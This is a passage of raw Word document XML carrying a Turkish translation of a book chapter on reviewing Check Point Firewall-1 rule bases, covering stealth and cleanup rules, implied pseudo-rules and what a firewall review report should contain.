        <w:t>Bir kural tabanı incelemesinin amacı, güvenlik duvarının izin verdiği hizmetleri ve verilerini görmektir. Kural tabanının analizi ayrıca gereksiz, tekrarlayan veya yetkisiz kuralları tanımlamak içindir. Kural tabanı mümkün olduğunca basit yapılmalıdır. Kural sayısını azaltmanın bir yolu kuralları birleştirmektir, çünkü bazen tekrarlayan kurallar birleştirilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4B19">
        <w:t>Bir kural tabanı incelemesinin amacı, güvenlik duvarının izin verdiği hizmetleri ve verilerini görmektir. Kural tabanının analizi ayrıca gereksiz, tekrarlayan veya yetkisiz kuralları tanımlamak içindir. Kural tabanı mümkün olduğunca basit yapılmalıdır. Kural sayısını azaltmanın bir yolu kuralları birleştirmektir, çünkü bazen tekrarlayan kurallar birleştirilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CE83E5F" wp14:editId="44AD8413">
            <wp:extent cx="2552700" cy="2876550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4106" name="Resim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2700" cy="2876550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4B19">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C4B19">
        <w:t>Mevcut nesneler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FB0A445" wp14:editId="469ABCF7">
            <wp:extent cx="4267200" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4107" name="Resim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200" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="006C72A6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Grupta çok sayıda iş istasyonu bulunan bir ağ nesnesi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bir kural tabanı incelemesinin işlevi, güvenlik duvarının beklenenleri zorladığından emin olmaktır. Lance Spitzner, Güvenlik Duvarı Kuralı Tabanı Oluşturma'da “sağlam bir kural tabanı oluşturmak kritik, önemli değilse de başarılı ve güvenli bir güvenlik duvarı uygulama adımı” olduğunu yazıyor. Güvenlik yöneticileri ve Uzmanların çoğu genellikle hangi platformların ve uygulamaların en iyi güvenlik duvarlarını yaptığını tartışıyor. Ancak, bunların hepsi güvenlik duvarı kural tabanı yanlış yapılandırılmışsa anlamsızdır. ”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:t>Kural tabanı, bir Checkpoint güvenlik duvarının kalbi ve ruhudur. Bir kural tabanı, güvenlik duvarında depolanan ve her bir güvenlik duvarı için ayrı bir güvenlik politikası tanımlayan sıralı bir kurallar kümesi içeren bir dosyadır. Kural temel dosyasına erişim, fiziksel olarak güvenlik duvarında bulunanlarla veya yapılandırma ayarlarında belirtilen GUI istemci listesinin bir üyesi olanlarla sınırlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bir kural, iletişimi kaynağı, hedefi ve servisi açısından açıklar. Kural ayrıca iletişimin kabul edilip edilmemesi veya reddedilmesi gerekip gerekmediği ve bir günlük girişi oluşturulmuş olup olmadığı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:t>Firewall-1 inceleme motoru, “en uygun” bir cihaza karşılık, “ilk kullanıma uygundur”. Bu, birinin 20 kural içeren bir kural tabanına sahip olması ve gelen paketin kural # 4 ile eşleşmesi durumunda, denetim motorunun derhal durması (kurallar, her paket için sırayla incelenmesi nedeniyle) ve kural tabanının geri kalanından geçmediği anlamına gelir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural tabanı incelemesine gelince, güvenlik uzmanı Lance Spitzer, hedefin 30'dan fazla kuralın bulunmamasını önermektedir. 30 kuraldan daha fazlası olduğunda, katlanarak işler karmaşıklaşır ve hatalar olur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Her kural tabanının ayrı bir adı vardır. Ortak bir adlandırma kuralına standart hale getirmek yararlıdır. Önerilen bir biçim: </w:t>
      </w:r>
      <w:r w:rsidRPr="000573CC">
        <w:t>firewallname_administrators-initials_date-of-change; for example, fw1_am_071298.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bu adlandırma kuralının sonucu, güvenlik duvarı yöneticisinin kural tabanının tam olarak hangi güvenlik duvarına ait olduğunu bilmesidir; kural tabanı en son değiştirildiğinde; ve mevcut yapılandırmayı en son kim değiştirdi? Kural tabanı incelemesi için, her kural incelenmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Altı kuralı olan basit bir kural tabanına bir örnek Exhibit 41.7'de gösterildiği gibidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kural 1 ve 2</w:t>
      </w:r>
      <w:r w:rsidRPr="000573CC">
        <w:t xml:space="preserve">, gizli kurallar kavramını yürürlüğe koyar; bu nedenle, GUI onaylı yöneticiler dışında hiçbir şey doğrudan güvenlik duvarına bağlanamaz. Kural 1, Firewall-1'e FW_Administrators grubunun bir üyesinden olmadıkça herhangi bir paketi bırakmasını söyler. </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall-1 hizmeti önceden tanımlanmıştır ve tüm Firewall-1 yönetim portlarını tanımlar. Gizli kural için, reddedilmek yerine, özellikle biri paketi bırakmak istiyor. Reddedilen bir paket, gönderene uzak tarafta bir şey olduğunu söylerken, bırakılan bir paket mutlaka bir uzaktaki bilgisayarı belirtmez. Ayrıca bu kural günlüğe kaydedilir; Böylece, kimin güvenlik duvarına doğrudan bağlantı kurmaya çalıştığı hakkında ayrıntılı bilgi toplanabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="395017AA" wp14:editId="50A8969E">
            <wp:extent cx="5760720" cy="3617595"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="4108" name="Resim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617595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000573CC">
        <w:t>Basit bir kural tabanı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:t>Kural 3, iç posta sunucularına herhangi bir ana e-posta bağlantısına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 4, dahili Web sunucularına herhangi bir ana bilgisayar HTTP ve HTTPS bağlantısına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000573CC">
        <w:t>Kural 5, belirtilen dört protokol için İnternete dahili ana bilgisayar bağlantısına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 6, temizleme kuralıdır. Bu noktada güvenlik duvarı tarafından işlenmeyen herhangi bir paket bırakılacak ve kaydedilecektir. Gerçek şu ki, bu noktada güvenlik duvarı tarafından işlenmeyen herhangi bir paketin bırakılması neyse. Bu temizleme kuralının avantajı, bu paketlerin günlüğe kaydedilmesidir. Bu şekilde, hangi paketlerin güvenlik duvarı tarafından kullanılmadığı görülebilir. Bu, daha ölçeklenebilir bir güvenlik duvarı mimarisi tasarlamada yardımcı olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yukarıdaki kural temeli örneğinde sadece altı kural vardı ve oldukça basitti. Çoğu kurumsal kural tabanı daha ayrıntılı ve karmaşıktır. 50 kural ve binlerce ağ nesnesi içeren bir kural tabanından geçmek biraz zaman alabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exhibit 41.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> biraz daha ilgili olan bir kural tabanı görüntüler:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 1, gizli kuralı uygular.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 2–4, posta sunucuları ve istemciler arasında posta trafiğine izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Kural 5, iç Web sunucularına herhangi bir ana bilgisayar HTTP bağlantısına izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Kural 6, DMZ ile bir intranet arasındaki trafiği durdurur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 7-8, DMZ ile intranet arasında gelen ve giden trafiği durdurur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 9 çok fazla trafiğe neden olan protokolleri bırakın - bu durumda, nbdatagram, nbname ve nbsession.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kural 10, temizleme kuralıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gözden geçirme yapılırken belirli bir kuralın gerekli olduğuna dair bir şüphe varsa, devre dışı bırakılabilir. Genel bir kural olarak, bir kural devre dışı bırakılırsa ve kimse şikayet etmezse, kural silinebilir. Exhibit 41.9, devre dışı bırakılmış bir kural örneğini gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kapalı Sözlü Kurallar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t xml:space="preserve">Örtülü sahte kurallar normal kural tabanında görünmeyen ancak Güvenlik İlkesinin Özellikler Kurulumu ayarlarına göre Güvenlik Duvarı-1 tarafından otomatik olarak oluşturulan kurallardır. Bu kurallar Güvenlik Politikası GUI uygulamasında kural tabanı ile birlikte görüntülenebilir. </w:t>
      </w:r>
      <w:r>
        <w:t>Exhibit</w:t>
      </w:r>
      <w:r w:rsidRPr="000652AB">
        <w:t xml:space="preserve"> 41.10, bir kural tabanından gelen tek bir kuralla ima edilen sahte kurallara bir örnek gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tek ve tek kural tüm trafiği örtük olarak bıraksa da, güvenlik duvarından geçebilecek çok fazla trafik var. Bu zımni sözde kurallardan görüldüğü gibi, bağlantının çoğu güvenlik duvarının iç işlemleriyle ilgilidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adım 6: Hepsini Bir Raporda Birleştirin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Tüm çalışmalar tamamlandıktan sonra, güvenlik duvarı incelemesinin belgelenmesi gerekir. Bir ön inceleme raporundaki değer, bulunan anomalileri düzeltmek için bir kaynak olarak kullanılabileceğidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Daha önce de belirtildiği gibi, tarama araçlarının sağladığı kullanım kolaylığı, çok büyük bir raporun oluşturulmasını zahmetsiz hale getirir. Ancak bir güvenlik duvarı incelemesinin bir müşterinin değerine sahip olması için, aşağıdakileri içermesi gerekir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Mevcut güvenlik durumu: mevcut ağ ortamının temelini ve mevcut güvenlik duruşunu detaylandırın; Bu, kuruluşun genel güvenlik hedefleriyle senkronizasyonu sağlamak için kurumsal risk değerlendirmesine atıfta bulunmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:t>Tüm güvenlik açıklarının tespiti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EA71EA3" wp14:editId="1C4F3AFE">
            <wp:extent cx="5760720" cy="4204970"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="4109" name="Resim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204970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="000652AB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000652AB">
        <w:t>Karmaşık kural tabanı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2696EBC8" wp14:editId="06E01267">
            <wp:extent cx="5760720" cy="653415"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4110" name="Resim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653415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="002317C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Devre dışı bırakılmış kural</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D2EBC7A" wp14:editId="650183F6">
            <wp:extent cx="5114925" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4111" name="Resim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4925" cy="3914775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
      <w:r w:rsidRPr="002317C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kapalı Sözde Kurallar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002317C9">
        <w:t>Düzeltmeler, çözümler ve uygulama öncelikleri önerin; Tüm çözümlerin ve düzeltmelerin nasıl birleşeceğini gösteren ayrıntılı bir uygulama planı sunulmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Maliyet riskleri, kullanım kolaylığı, işletme gereklilikleri ve kabul edilebilir risk seviyeleri ile ilgili güvenlik takaslarının detaylı analizi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sistemlerin güvenli bir şekilde hayata geçirildiğinden emin olmak için gelecekteki referans ve karşılaştırma için temel veriler sağlayın</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002317C9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Sonuç</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="002317C9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002317C9">
        <w:t>Bir güvenlik duvarı, doğru şekilde uygulanma derecesinde etkilidir. Ve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bugünün kurumsal ortamlarında, </w:t>
      </w:r>
      <w:r w:rsidRPr="002317C9">
        <w:t>Bir güvenlik duvarının yanlış yapılandırılmış olması kolaydır. Güvenlik duvarı kurulumunu inceleyere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">k, güvenlik duvarı yöneticileri </w:t>
      </w:r>
      <w:r w:rsidRPr="002317C9">
        <w:t>Güvenlik duvarlarının beklediklerini güvenli bir şekilde uygulayabilmele</w:t>
